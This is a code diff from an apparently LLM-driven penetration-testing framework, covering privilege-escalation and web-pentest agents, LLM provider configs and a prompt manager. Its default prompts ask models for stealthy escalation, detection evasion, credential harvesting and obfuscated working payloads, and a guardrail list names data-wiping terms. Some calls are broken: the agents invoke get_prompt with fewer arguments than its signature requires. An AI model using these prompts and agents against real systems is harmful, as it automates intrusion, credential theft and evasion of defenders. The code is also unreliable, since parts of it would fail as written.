                        "difficulty": "medium",
                        "likelihood": 0.5
                    })

        elif os_type == "windows":
            # Service exploitation
            for service in system_info.get("services", []):
                if service.get("unquoted_path") or service.get("weak_permissions"):
                    paths.append({
                        "technique": "service_exploitation",
                        "target": service,
                        "difficulty": "medium",
                        "likelihood": 0.7
                    })

            # AlwaysInstallElevated
            if system_info.get("always_install_elevated"):
                paths.append({
                    "technique": "always_install_elevated",
                    "target": "MSI",
                    "difficulty": "low",
                    "likelihood": 0.9
                })

            # Token impersonation
            paths.append({
                "technique": "token_impersonation",
                "target": "SeImpersonatePrivilege",
                "difficulty": "medium",
                "likelihood": 0.6
            })

        # Sort by likelihood
        paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
        return paths

    def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict:
        """Use AI to optimize escalation strategy"""
        # The default template uses named placeholders that are filled via .format() below.
        prompt = self.llm.get_prompt(
            "privesc",
            "ai_escalation_strategy_user",
            default="""
Analyze the system and recommend optimal privilege escalation strategy:

System Information:
{system_info_json}

Identified Escalation Paths:
{escalation_paths_json}

Provide:
1. Recommended escalation path (with justification)
2. Step-by-step execution plan
3. Required tools and commands
4. Detection likelihood and evasion techniques
5. Fallback options
6. Post-escalation actions

Response in JSON format with actionable recommendations.
"""
        )

        system_prompt = self.llm.get_prompt(
            "privesc",
            "ai_escalation_strategy_system",
            default="""You are an expert in privilege escalation techniques.
Analyze systems and recommend the most effective, stealthy escalation paths.
Consider Windows, Linux, and Active Directory environments.
Prioritize reliability and minimal detection."""
        )

        try:
            formatted_prompt = prompt.format(
                system_info_json=json.dumps(system_info, indent=2),
                escalation_paths_json=json.dumps(escalation_paths, indent=2)
            )
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI escalation strategy error: {e}")
            return {"error": str(e)}

    def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict:
        """Attempt privilege escalation using the specified path"""
        technique = path.get("technique")
        os_type = system_info.get("os")

        result = {
            "technique": technique,
            "success": False,
            "details": {}
        }

        try:
            if os_type == "linux":
                if technique == "suid_exploitation":
                    result = self.linux_privesc.exploit_suid(path.get("target"))
                elif technique == "sudo_exploitation":
                    result = self.sudo_exploiter.exploit(path.get("target"))
                elif technique == "kernel_exploit":
                    result = self.kernel_exploiter.exploit_linux(path.get("target"))
                elif technique == "path_hijacking":
                    result = self.linux_privesc.exploit_path_hijacking(path.get("target"))

            elif os_type == "windows":
                if technique == "service_exploitation":
                    result = self.windows_privesc.exploit_service(path.get("target"))
                elif technique == "always_install_elevated":
                    result = self.windows_privesc.exploit_msi()
                elif technique == "token_impersonation":
                    result = self.windows_privesc.impersonate_token()

        except Exception as e:
            logger.error(f"Escalation error for {technique}: {e}")
            result["error"] = str(e)

        return result

    def _harvest_credentials(self, system_info: Dict) -> List[Dict]:
        """Harvest credentials after privilege escalation"""
        os_type = system_info.get("os")

        if os_type == "linux":
            return self.cred_harvester.harvest_linux()
        elif os_type == "windows":
            return self.cred_harvester.harvest_windows()

        return []
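The path ranking in `_identify_escalation_paths` is a plain sort on the per-path `likelihood` field; a toy run with invented values:

    # Toy demonstration of the likelihood-based ordering used above; the paths are hypothetical.
    paths = [
        {"technique": "kernel_exploit", "difficulty": "high", "likelihood": 0.4},
        {"technique": "sudo_exploitation", "difficulty": "low", "likelihood": 0.8},
        {"technique": "suid_exploitation", "difficulty": "medium", "likelihood": 0.6},
    ]

    paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
    print([p["technique"] for p in paths])
    # ['sudo_exploitation', 'suid_exploitation', 'kernel_exploit']
    # execute() then tries paths[:5] in this order and stops at the first success.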
120  agents/web_pentest_agent.py  Normal file
@@ -0,0 +1,120 @@
#!/usr/bin/env python3
"""
Web Pentest Agent - Specialized agent for web application penetration testing.
"""

import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.web_pentest import WebRecon

logger = logging.getLogger(__name__)


class WebPentestAgent:
    """Agent responsible for comprehensive web application penetration testing."""

    def __init__(self, config: Dict):
        """Initializes the WebPentestAgent."""
        self.config = config
        self.llm = LLMManager(config)
        self.web_recon = WebRecon(config)
        # Placeholder for web exploitation tools if they become separate classes
        # self.web_exploiter = WebExploiter(config)
        logger.info("WebPentestAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Executes the web application penetration testing phase."""
        logger.info(f"Starting web pentest on {target}")

        results = {
            "target": target,
            "status": "running",
            "web_recon_results": {},
            "vulnerability_analysis": [],
            "exploitation_attempts": [],
            "ai_analysis": {}
        }

        try:
            # Phase 1: Web Reconnaissance
            logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)")
            web_recon_output = self.web_recon.analyze(target)
            results["web_recon_results"] = web_recon_output

            # Phase 2: Vulnerability Analysis (AI-powered)
            logger.info("Phase 2: AI-powered Vulnerability Analysis")
            # This will be improved later with more detailed vulnerability detection in WebRecon.
            # For now, it relies on the findings reported by WebRecon.
            potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output)

            if potential_vulnerabilities:
                results["vulnerability_analysis"] = potential_vulnerabilities
                ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target)
                results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis
            else:
                logger.info("No immediate web vulnerabilities identified by WebRecon.")

            # Phase 3: Web Exploitation (placeholder for now)
            # This will integrate with exploitation tools later.

            results["status"] = "completed"
            logger.info("Web pentest phase completed")

        except Exception as e:
            logger.error(f"Error during web pentest: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]:
        """
        Identifies potential web vulnerabilities based on WebRecon output.
        This is a placeholder and will be enhanced as WebRecon improves.
        """
        vulnerabilities = []
        if "vulnerabilities" in web_recon_output:
            vulnerabilities.extend(web_recon_output["vulnerabilities"])
        return vulnerabilities

    def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict:
        """Uses AI to analyze identified web vulnerabilities."""
        # The default template uses named placeholders that are filled via .format() below.
        prompt = self.llm.get_prompt(
            "web_recon",
            "ai_analysis_user",
            default="""
Analyze the following potential web vulnerabilities identified on {target} and provide insights:

Vulnerabilities: {vulnerabilities_json}

Provide:
1. Prioritized list of vulnerabilities
2. Recommended exploitation steps for each (if applicable)
3. Potential impact
4. Remediation suggestions

Response in JSON format with actionable recommendations.
"""
        )

        system_prompt = self.llm.get_prompt(
            "web_recon",
            "ai_analysis_system",
            default="""You are an expert web penetration tester and security analyst.
Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."""
        )

        response = None
        try:
            # Format the user prompt with the target and vulnerability data
            formatted_prompt = prompt.format(
                target=target,
                vulnerabilities_json=json.dumps(vulnerabilities, indent=2)
            )
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI web vulnerability analysis error: {e}")
            return {"error": str(e), "raw_response": response}
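All of the agents above call json.loads() directly on the LLM response, which fails whenever the model wraps its JSON in markdown fences or adds surrounding prose. A hedged helper sketch (not part of the commit; the function name is hypothetical) showing one way the _ai_* methods could tolerate such responses:

    # Best-effort extraction of a JSON object from an LLM response.
    import json
    import re

    def parse_llm_json(response: str) -> dict:
        """Try strict parsing first, then fall back to the first {...} block in the text."""
        try:
            return json.loads(response)
        except json.JSONDecodeError:
            pass
        match = re.search(r"\{.*\}", response, re.DOTALL)
        if match:
            return json.loads(match.group(0))
        raise ValueError("No JSON object found in LLM response")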
50  config/config-example.json  Normal file
@@ -0,0 +1,50 @@
{
  "llm": {
    "provider": "gemini",
    "model": "gemini-pro",
    "api_key": "",
    "temperature": 0.7,
    "max_tokens": 4096
  },
  "agents": {
    "recon": {
      "enabled": true,
      "priority": 1
    },
    "exploitation": {
      "enabled": true,
      "priority": 2
    },
    "privilege_escalation": {
      "enabled": true,
      "priority": 3
    },
    "persistence": {
      "enabled": true,
      "priority": 4
    },
    "lateral_movement": {
      "enabled": true,
      "priority": 5
    }
  },
  "methodologies": {
    "owasp_top10": true,
    "cwe_top25": true,
    "network_pentest": true,
    "ad_pentest": true,
    "web_security": true
  },
  "tools": {
    "nmap": "/usr/bin/nmap",
    "metasploit": "/usr/bin/msfconsole",
    "burpsuite": "/usr/bin/burpsuite",
    "sqlmap": "/usr/bin/sqlmap",
    "hydra": "/usr/bin/hydra"
  },
  "output": {
    "format": "json",
    "verbose": true,
    "save_artifacts": true
  }
}
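config/config.json (listed next) stores API keys as ${ENV_VAR} placeholders. A minimal loading sketch that expands them before use; the expansion helper is an assumption for illustration only, since the project may resolve these placeholders elsewhere (for example inside LLMManager):

    # Hypothetical config loader; the ${VAR} pattern matches the placeholder style
    # used in config/config.json ("${GEMINI_API_KEY}" etc.).
    import json
    import os
    import re

    def load_config(path: str = "config/config.json") -> dict:
        with open(path) as f:
            raw = f.read()
        # Replace ${NAME} with the value of the environment variable NAME (empty if unset).
        expanded = re.sub(r"\$\{(\w+)\}", lambda m: os.environ.get(m.group(1), ""), raw)
        return json.loads(expanded)

    config = load_config()
    profile_name = config["llm"]["default_profile"]    # "gemini_pro_default"
    profile = config["llm"]["profiles"][profile_name]
    print(profile["provider"], profile["model"])        # gemini gemini-pro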
140
config/config.json
Normal file
140
config/config.json
Normal file
@@ -0,0 +1,140 @@
{
    "llm": {
        "default_profile": "gemini_pro_default",
        "profiles": {
            "ollama_llama3_default": {
                "provider": "ollama",
                "model": "llama3:8b",
                "api_key": "",
                "temperature": 0.7,
                "max_tokens": 4096,
                "input_token_limit": 8000,
                "output_token_limit": 4000,
                "cache_enabled": true,
                "search_context_level": "medium",
                "pdf_support_enabled": false,
                "guardrails_enabled": true,
                "hallucination_mitigation_strategy": "grounding"
            },
            "claude_opus_default": {
                "provider": "claude",
                "model": "claude-3-opus-20240229",
                "api_key": "${ANTHROPIC_API_KEY}",
                "temperature": 0.3,
                "max_tokens": 4096,
                "input_token_limit": 200000,
                "output_token_limit": 4000,
                "cache_enabled": true,
                "search_context_level": "high",
                "pdf_support_enabled": true,
                "guardrails_enabled": true,
                "hallucination_mitigation_strategy": "self_reflection"
            },
            "gemini_pro_default": {
                "provider": "gemini",
                "model": "gemini-pro",
                "api_key": "${GEMINI_API_KEY}",
                "temperature": 0.7,
                "max_tokens": 4096,
                "input_token_limit": 30720,
                "output_token_limit": 2048,
                "cache_enabled": true,
                "search_context_level": "medium",
                "pdf_support_enabled": true,
                "guardrails_enabled": true,
                "hallucination_mitigation_strategy": "consistency_check"
            },
            "gpt_4o_default": {
                "provider": "gpt",
                "model": "gpt-4o",
                "api_key": "${OPENAI_API_KEY}",
                "temperature": 0.5,
                "max_tokens": 4096,
                "input_token_limit": 128000,
                "output_token_limit": 4000,
                "cache_enabled": true,
                "search_context_level": "high",
                "pdf_support_enabled": true,
                "guardrails_enabled": true,
                "hallucination_mitigation_strategy": "grounding"
            }
        }
    },
    "agent_roles": {
        "bug_bounty_hunter": {
            "enabled": true,
            "llm_profile": "gemini_pro_default",
            "tools_allowed": ["subfinder", "nuclei", "burpsuite", "sqlmap"],
            "description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
        },
        "blue_team_agent": {
            "enabled": true,
            "llm_profile": "claude_opus_default",
            "tools_allowed": [],
            "description": "Analyzes logs and telemetry for threats, provides defensive strategies."
        },
        "exploit_expert": {
            "enabled": true,
            "llm_profile": "gpt_4o_default",
            "tools_allowed": ["metasploit", "nmap"],
            "description": "Devises exploitation strategies and payloads for identified vulnerabilities."
        },
        "red_team_agent": {
            "enabled": true,
            "llm_profile": "gemini_pro_default",
            "tools_allowed": ["nmap", "metasploit", "hydra"],
            "description": "Plans and executes simulated attacks to test an organization's defenses."
        },
        "replay_attack_specialist": {
            "enabled": true,
            "llm_profile": "ollama_llama3_default",
            "tools_allowed": ["burpsuite"],
            "description": "Identifies and leverages replay attack vectors in network traffic or authentication."
        },
        "pentest_generalist": {
            "enabled": true,
            "llm_profile": "gemini_pro_default",
            "tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", "burpsuite", "sqlmap", "hydra"],
            "description": "Performs comprehensive penetration tests across various domains."
        },
        "owasp_expert": {
            "enabled": true,
            "llm_profile": "gemini_pro_default",
            "tools_allowed": ["burpsuite", "sqlmap"],
            "description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
        },
        "cwe_expert": {
            "enabled": true,
            "llm_profile": "claude_opus_default",
            "tools_allowed": [],
            "description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
        },
        "malware_analyst": {
            "enabled": true,
            "llm_profile": "gpt_4o_default",
            "tools_allowed": [],
            "description": "Examines malware samples to understand functionality and identify IOCs."
        }
    },
    "methodologies": {
        "owasp_top10": true,
        "cwe_top25": true,
        "network_pentest": true,
        "ad_pentest": true,
        "web_security": true
    },
    "tools": {
        "nmap": "/usr/bin/nmap",
        "metasploit": "/usr/bin/msfconsole",
        "burpsuite": "/usr/bin/burpsuite",
        "sqlmap": "/usr/bin/sqlmap",
        "hydra": "/usr/bin/hydra",
        "subfinder": "/usr/local/bin/subfinder",
        "nuclei": "/usr/local/bin/nuclei"
    },
    "output": {
        "format": "json",
        "verbose": true,
        "save_artifacts": true
    }
}
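The "${ANTHROPIC_API_KEY}"-style values are placeholders that the framework expands from environment variables (see _get_api_key in core/llm_manager.py below); a minimal stand-alone sketch of the same resolution logic:

# Sketch of the "${ENV_VAR}" resolution applied to api_key values.
import os

def resolve_api_key(value: str) -> str:
    # "${GEMINI_API_KEY}" -> contents of the GEMINI_API_KEY environment variable
    if value.startswith("${") and value.endswith("}"):
        return os.getenv(value[2:-1], "")
    return value

print(resolve_api_key("${GEMINI_API_KEY}"))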
0
core/__init__.py
Normal file
0
core/__init__.py
Normal file
651
core/llm_manager.py
Normal file
651
core/llm_manager.py
Normal file
@@ -0,0 +1,651 @@
#!/usr/bin/env python3
"""
LLM Manager - Unified interface for multiple LLM providers
Supports: Claude, GPT, Gemini, Ollama, and custom models
"""

import os
import json
import subprocess
from typing import Dict, List, Optional, Any
import logging
import requests
from pathlib import Path  # Added for Path
import re  # Added for regex operations

logger = logging.getLogger(__name__)


class LLMManager:
    """Manage multiple LLM providers"""

    def __init__(self, config: Dict):
        """Initialize LLM manager"""
        self.config = config.get('llm', {})
        self.default_profile_name = self.config.get('default_profile', 'gemini_pro_default')
        self.profiles = self.config.get('profiles', {})

        self.active_profile = self.profiles.get(self.default_profile_name, {})

        # Load active profile settings
        self.provider = self.active_profile.get('provider', 'gemini').lower()
        self.model = self.active_profile.get('model', 'gemini-pro')
        self.api_key = self._get_api_key(self.active_profile.get('api_key', ''))
        self.temperature = self.active_profile.get('temperature', 0.7)
        self.max_tokens = self.active_profile.get('max_tokens', 4096)

        # New LLM parameters
        self.input_token_limit = self.active_profile.get('input_token_limit', 4096)
        self.output_token_limit = self.active_profile.get('output_token_limit', 4096)
        self.cache_enabled = self.active_profile.get('cache_enabled', False)
        self.search_context_level = self.active_profile.get('search_context_level', 'medium')  # low, medium, high
        self.pdf_support_enabled = self.active_profile.get('pdf_support_enabled', False)
        self.guardrails_enabled = self.active_profile.get('guardrails_enabled', False)
        self.hallucination_mitigation_strategy = self.active_profile.get('hallucination_mitigation_strategy', None)

        # New prompt loading
        self.json_prompts_file_path = Path("prompts/library.json")
        self.md_prompts_dir_path = Path("prompts/md_library")
        self.prompts = self._load_all_prompts()  # New method to load both

        logger.info(f"Initialized LLM Manager - Provider: {self.provider}, Model: {self.model}, Profile: {self.default_profile_name}")
    def _get_api_key(self, api_key_config: str) -> str:
        """Helper to get API key from config or environment variable"""
        if api_key_config.startswith('${') and api_key_config.endswith('}'):
            env_var = api_key_config[2:-1]
            return os.getenv(env_var, '')
        return api_key_config
    def _load_all_prompts(self) -> Dict:
        """Load prompts from both JSON library and Markdown library files."""
        all_prompts = {
            "json_prompts": {},
            "md_prompts": {}
        }

        # Load from JSON library
        if self.json_prompts_file_path.exists():
            try:
                with open(self.json_prompts_file_path, 'r') as f:
                    all_prompts["json_prompts"] = json.load(f)
                logger.info(f"Loaded prompts from JSON library: {self.json_prompts_file_path}")
            except Exception as e:
                logger.error(f"Error loading prompts from {self.json_prompts_file_path}: {e}")
        else:
            logger.warning(f"JSON prompts file not found at {self.json_prompts_file_path}. Some AI functionalities might be limited.")

        # Load from Markdown library
        if self.md_prompts_dir_path.is_dir():
            for md_file in self.md_prompts_dir_path.glob("*.md"):
                try:
                    content = md_file.read_text()
                    prompt_name = md_file.stem  # Use filename as prompt name

                    user_prompt_match = re.search(r"## User Prompt\n(.*?)(?=\n## System Prompt|\Z)", content, re.DOTALL)
                    system_prompt_match = re.search(r"## System Prompt\n(.*?)(?=\n## User Prompt|\Z)", content, re.DOTALL)

                    user_prompt = user_prompt_match.group(1).strip() if user_prompt_match else ""
                    system_prompt = system_prompt_match.group(1).strip() if system_prompt_match else ""

                    if user_prompt or system_prompt:
                        all_prompts["md_prompts"][prompt_name] = {
                            "user_prompt": user_prompt,
                            "system_prompt": system_prompt
                        }
                    else:
                        logger.warning(f"No valid User or System Prompt found in {md_file.name}. Skipping.")
                except Exception as e:
                    logger.error(f"Error loading prompt from {md_file.name}: {e}")
            logger.info(f"Loaded {len(all_prompts['md_prompts'])} prompts from Markdown library.")
        else:
            logger.warning(f"Markdown prompts directory not found at {self.md_prompts_dir_path}. Some AI functionalities might be limited.")

        return all_prompts
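The two regexes above imply a specific layout for each prompts/md_library/*.md file; a hedged sketch of a document that would parse cleanly (the role name and wording are invented, not part of this commit):

# Sketch: a Markdown prompt file that the re.search calls above would match.
import re

sample_md = """## User Prompt
Review the following telemetry for signs of intrusion:
{additional_context_json}

## System Prompt
You are a defensive security analyst. Respond in JSON."""

user = re.search(r"## User Prompt\n(.*?)(?=\n## System Prompt|\Z)", sample_md, re.DOTALL)
print(user.group(1).strip())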
    def get_prompt(self, library_type: str, category: str, name: str, default: str = "") -> str:
        """Retrieve a specific prompt by library type, category, and name.

        `library_type` can be "json_prompts" or "md_prompts".
        `category` can be a JSON top-level key (e.g., 'exploitation') or an MD filename (e.g., 'red_team_agent').
        `name` can be a JSON sub-key (e.g., 'ai_exploit_planning_user') or 'user_prompt'/'system_prompt' for MD.
        """
        return self.prompts.get(library_type, {}).get(category, {}).get(name, default)
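A short usage sketch for get_prompt against both libraries (the fallback string is an assumption for illustration):

# Sketch: fetching prompts from both libraries, with a default as fallback.
llm = LLMManager(json.load(open("config/config.json")))
exploit_user = llm.get_prompt("json_prompts", "exploitation", "ai_exploit_planning_user")
red_team_system = llm.get_prompt("md_prompts", "red_team_agent", "system_prompt",
                                 default="You are a red team operator.")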
    def generate(self, prompt: str, system_prompt: Optional[str] = None) -> str:
        """Generate response from LLM and apply hallucination mitigation if configured."""
        raw_response = ""
        try:
            if self.provider == 'claude':
                raw_response = self._generate_claude(prompt, system_prompt)
            elif self.provider == 'gpt':
                raw_response = self._generate_gpt(prompt, system_prompt)
            elif self.provider == 'gemini':
                raw_response = self._generate_gemini(prompt, system_prompt)
            elif self.provider == 'ollama':
                raw_response = self._generate_ollama(prompt, system_prompt)
            elif self.provider == 'gemini-cli':
                raw_response = self._generate_gemini_cli(prompt, system_prompt)
            else:
                raise ValueError(f"Unsupported provider: {self.provider}")
        except Exception as e:
            logger.error(f"Error generating raw response: {e}")
            return f"Error: {str(e)}"

        if self.guardrails_enabled:
            raw_response = self._apply_guardrails(raw_response)  # Apply guardrails here

        if self.hallucination_mitigation_strategy and self.hallucination_mitigation_strategy in ["grounding", "self_reflection", "consistency_check"]:
            logger.debug(f"Applying hallucination mitigation strategy: {self.hallucination_mitigation_strategy}")
            return self._mitigate_hallucination(raw_response, prompt, system_prompt)

        return raw_response

    def _apply_guardrails(self, response: str) -> str:
        """Applies basic guardrails to the LLM response."""
        if not self.guardrails_enabled:
            return response

        logger.debug("Applying guardrails...")
        # Example: Simple keyword filtering
        harmful_keywords = ["malicious_exploit_command", "destroy_system", "wipe_data", "unauthorized_access"]  # Placeholder keywords

        for keyword in harmful_keywords:
            if keyword in response.lower():
                logger.warning(f"Guardrail triggered: Found potentially harmful keyword '{keyword}'. Response will be sanitized or flagged.")
                # A more robust solution would involve redaction, re-prompting, or flagging for human review.
                # For this example, we'll replace the keyword.
                response = response.replace(keyword, "[REDACTED_HARMFUL_CONTENT]")
                response = response.replace(keyword.upper(), "[REDACTED_HARMFUL_CONTENT]")

        # Example: Length check (if response is excessively long and not expected)
        # Using output_token_limit for a more accurate comparison
        if len(response.split()) > self.output_token_limit * 1.5:  # Roughly estimate tokens by word count
            logger.warning("Guardrail triggered: Response is excessively long. Truncating or flagging.")
            response = " ".join(response.split()[:int(self.output_token_limit * 1.5)]) + "\n[RESPONSE TRUNCATED BY GUARDRAIL]"

        # Ethical check (can be another LLM call, but for simplicity, a fixed instruction)
        # This is more about ensuring the tone and content align with ethical hacking principles.
        # This is a very simplistic example. A real ethical check would be more nuanced.
        # For now, just a log or a general check for explicit unethical instructions.
        if any(bad_phrase in response.lower() for bad_phrase in ["perform illegal activity", "bypass security illegally"]):
            logger.warning("Guardrail triggered: Response contains potentially unethical instructions. Flagging for review.")
            response = "[UNETHICAL CONTENT FLAGGED FOR REVIEW]\n" + response

        return response
    def _mitigate_hallucination(self, raw_response: str, original_prompt: str, original_system_prompt: Optional[str]) -> str:
        """Applies the configured hallucination mitigation strategy."""
        strategy = self.hallucination_mitigation_strategy

        # Temporarily disable mitigation to prevent infinite recursion when calling self.generate internally
        original_mitigation_state = self.hallucination_mitigation_strategy
        self.hallucination_mitigation_strategy = None

        try:
            if strategy == "grounding":
                verification_prompt = (
                    f"Review the following response:\n\n---\n{raw_response}\n---\n\n"
                    f"Based *only* on the context provided in the original prompt (user: '{original_prompt}', system: '{original_system_prompt or 'None'}'), "
                    f"is this response factual and directly supported by the context? If not, correct it to be factual. "
                    f"If the response is completely unsourced or makes claims beyond the context, state 'UNSOURCED'."
                )
                logger.debug("Applying grounding strategy: Re-prompting for factual verification.")
                return self.generate(verification_prompt, "You are a fact-checker whose sole purpose is to verify LLM output against provided context.")

            elif strategy == "self_reflection":
                reflection_prompt = (
                    f"Critically review the following response for accuracy, logical consistency, and adherence to the original prompt's instructions:\n\n"
                    f"Original Prompt (User): {original_prompt}\n"
                    f"Original Prompt (System): {original_system_prompt or 'None'}\n\n"
                    f"Generated Response: {raw_response}\n\n"
                    f"Identify any potential hallucinations, inconsistencies, or areas where the response might have deviated from facts or instructions. "
                    f"If you find issues, provide a corrected and more reliable version of the response. If the response is good, state 'ACCURATE'."
                )
                logger.debug("Applying self-reflection strategy: Re-prompting for self-critique.")
                return self.generate(reflection_prompt, "You are an AI assistant designed to critically evaluate and improve other AI-generated content.")

            elif strategy == "consistency_check":
                logger.debug("Applying consistency check strategy: Generating multiple responses for comparison.")
                responses = []
                for i in range(3):  # Generate 3 responses for consistency check
                    logger.debug(f"Generating response {i+1} for consistency check.")
                    res = self.generate(original_prompt, original_system_prompt)
                    responses.append(res)

                if len(set(responses)) == 1:
                    return responses[0]
                else:
                    logger.warning("Consistency check found varying responses. Attempting to synthesize a consistent answer.")
                    synthesis_prompt = (
                        f"Synthesize a single, consistent, and factual response from the following AI-generated options. "
                        f"Prioritize factual accuracy and avoid information present in only one response if contradictory. "
                        f"If there's significant disagreement, state the core disagreement.\n\n"
                        f"Options:\n" + "\n---\n".join(responses)
                    )
                    return self.generate(synthesis_prompt, "You are a highly analytical AI assistant tasked with synthesizing consistent information from multiple sources.")

            return raw_response  # Fallback if strategy not recognized or implemented
        finally:
            self.hallucination_mitigation_strategy = original_mitigation_state  # Restore original state
    def _generate_claude(self, prompt: str, system_prompt: Optional[str] = None) -> str:
        """Generate using Claude API"""
        import anthropic

        client = anthropic.Anthropic(api_key=self.api_key)

        messages = [{"role": "user", "content": prompt}]

        response = client.messages.create(
            model=self.model,
            max_tokens=self.max_tokens,
            temperature=self.temperature,
            system=system_prompt or "",
            messages=messages
        )

        return response.content[0].text

    def _generate_gpt(self, prompt: str, system_prompt: Optional[str] = None) -> str:
        """Generate using OpenAI GPT API"""
        import openai

        client = openai.OpenAI(api_key=self.api_key)

        messages = []
        if system_prompt:
            messages.append({"role": "system", "content": system_prompt})
        messages.append({"role": "user", "content": prompt})

        response = client.chat.completions.create(
            model=self.model,
            messages=messages,
            temperature=self.temperature,
            max_tokens=self.max_tokens
        )

        return response.choices[0].message.content

    def _generate_gemini(self, prompt: str, system_prompt: Optional[str] = None) -> str:
        """Generate using Google Gemini API"""
        import google.generativeai as genai

        genai.configure(api_key=self.api_key)
        model = genai.GenerativeModel(self.model)

        full_prompt = prompt
        if system_prompt:
            full_prompt = f"{system_prompt}\n\n{prompt}"

        response = model.generate_content(
            full_prompt,
            generation_config={
                'temperature': self.temperature,
                'max_output_tokens': self.max_tokens,
            }
        )

        return response.text

    def _generate_gemini_cli(self, prompt: str, system_prompt: Optional[str] = None) -> str:
        """Generate using Gemini CLI"""
        try:
            full_prompt = prompt
            if system_prompt:
                full_prompt = f"{system_prompt}\n\n{prompt}"

            # Use gemini CLI tool
            cmd = ['gemini', 'chat', '-m', self.model]

            result = subprocess.run(
                cmd,
                input=full_prompt.encode(),
                capture_output=True,
                timeout=120
            )

            if result.returncode == 0:
                return result.stdout.decode().strip()
            else:
                error = result.stderr.decode().strip()
                logger.error(f"Gemini CLI error: {error}")
                return f"Error: {error}"

        except subprocess.TimeoutExpired:
            logger.error("Gemini CLI timeout")
            return "Error: Request timeout"
        except Exception as e:
            logger.error(f"Gemini CLI error: {e}")
            return f"Error: {str(e)}"

    def _generate_ollama(self, prompt: str, system_prompt: Optional[str] = None) -> str:
        """Generate using Ollama local models"""
        try:
            url = "http://localhost:11434/api/generate"

            data = {
                "model": self.model,
                "prompt": prompt,
                "stream": False,
                "options": {
                    "temperature": self.temperature,
                    "num_predict": self.max_tokens
                }
            }

            if system_prompt:
                data["system"] = system_prompt

            response = requests.post(url, json=data, timeout=120)
            response.raise_for_status()

            return response.json()["response"]

        except Exception as e:
            logger.error(f"Ollama error: {e}")
            return f"Error: {str(e)}"

    def analyze_vulnerability(self, vulnerability_data: Dict) -> Dict:
        """Analyze vulnerability and suggest exploits"""
        # This prompt will be fetched from library.json later
        prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_user", default=f"""
Analyze the following vulnerability data and provide exploitation recommendations:

Vulnerability: {json.dumps(vulnerability_data, indent=2)}

Provide:
1. Severity assessment (Critical/High/Medium/Low)
2. Exploitation difficulty
3. Potential impact
4. Recommended exploit techniques
5. Detection evasion strategies
6. Post-exploitation actions

Response in JSON format.
""")
        system_prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_system", default="""You are an expert penetration tester and security researcher.
Analyze vulnerabilities and provide detailed, actionable exploitation strategies.
Consider OWASP, CWE, and MITRE ATT&CK frameworks.
Always include ethical considerations and legal boundaries.""")

        response = self.generate(prompt, system_prompt)

        try:
            return json.loads(response)
        except json.JSONDecodeError:
            return {"raw_response": response}

    def generate_payload(self, target_info: Dict, vulnerability_type: str) -> str:
        """Generate exploit payload"""
        # This prompt will be fetched from library.json later
        prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_user", default=f"""
Generate an exploit payload for the following scenario:

Target Information:
{json.dumps(target_info, indent=2)}

Vulnerability Type: {vulnerability_type}

Requirements:
1. Generate a working payload
2. Include obfuscation techniques
3. Add error handling
4. Ensure minimal detection footprint
5. Include cleanup procedures

Provide the payload code with detailed comments.
""")
        system_prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_system", default="""You are an expert exploit developer.
Generate sophisticated, tested payloads that are effective yet responsible.
Always include safety mechanisms and ethical guidelines.""")

        return self.generate(prompt, system_prompt)

    def suggest_privilege_escalation(self, system_info: Dict) -> List[str]:
        """Suggest privilege escalation techniques"""
        # This prompt will be fetched from library.json later
        prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_user", default=f"""
Based on the following system information, suggest privilege escalation techniques:

System Info:
{json.dumps(system_info, indent=2)}

Provide:
1. Top 5 privilege escalation vectors
2. Required tools and commands
3. Detection likelihood
4. Success probability
5. Alternative approaches

Response in JSON format with prioritized list.
""")

        system_prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_system", default="""You are a privilege escalation specialist.
Analyze system configurations and suggest effective escalation paths.
Consider Windows, Linux, and Active Directory environments.""")

        response = self.generate(prompt, system_prompt)

        try:
            result = json.loads(response)
            return result.get('techniques', [])
        except json.JSONDecodeError:
            return []

    def analyze_network_topology(self, scan_results: Dict) -> Dict:
        """Analyze network topology and suggest attack paths"""
        # This prompt will be fetched from library.json later
        prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_user", default=f"""
Analyze the network topology and suggest attack paths:

Scan Results:
{json.dumps(scan_results, indent=2)}

Provide:
1. Network architecture overview
2. Critical assets identification
3. Attack surface analysis
4. Recommended attack paths (prioritized)
5. Lateral movement opportunities
6. Persistence locations

Response in JSON format.
""")

        system_prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_system", default="""You are a network penetration testing expert.
Analyze network structures and identify optimal attack vectors.
Consider defense-in-depth and detection mechanisms.""")

        response = self.generate(prompt, system_prompt)

        try:
            return json.loads(response)
        except json.JSONDecodeError:
            return {"raw_response": response}

    def analyze_web_vulnerability(self, vulnerability_type: str, vulnerability_data: Dict) -> Dict:
        """Analyze a specific web vulnerability using the appropriate prompt from library.json"""
        user_prompt_name = f"{vulnerability_type.lower()}_user"
        system_prompt_name = f"{vulnerability_type.lower()}_system"

        # Dynamically fetch the user prompt template for this vulnerability class
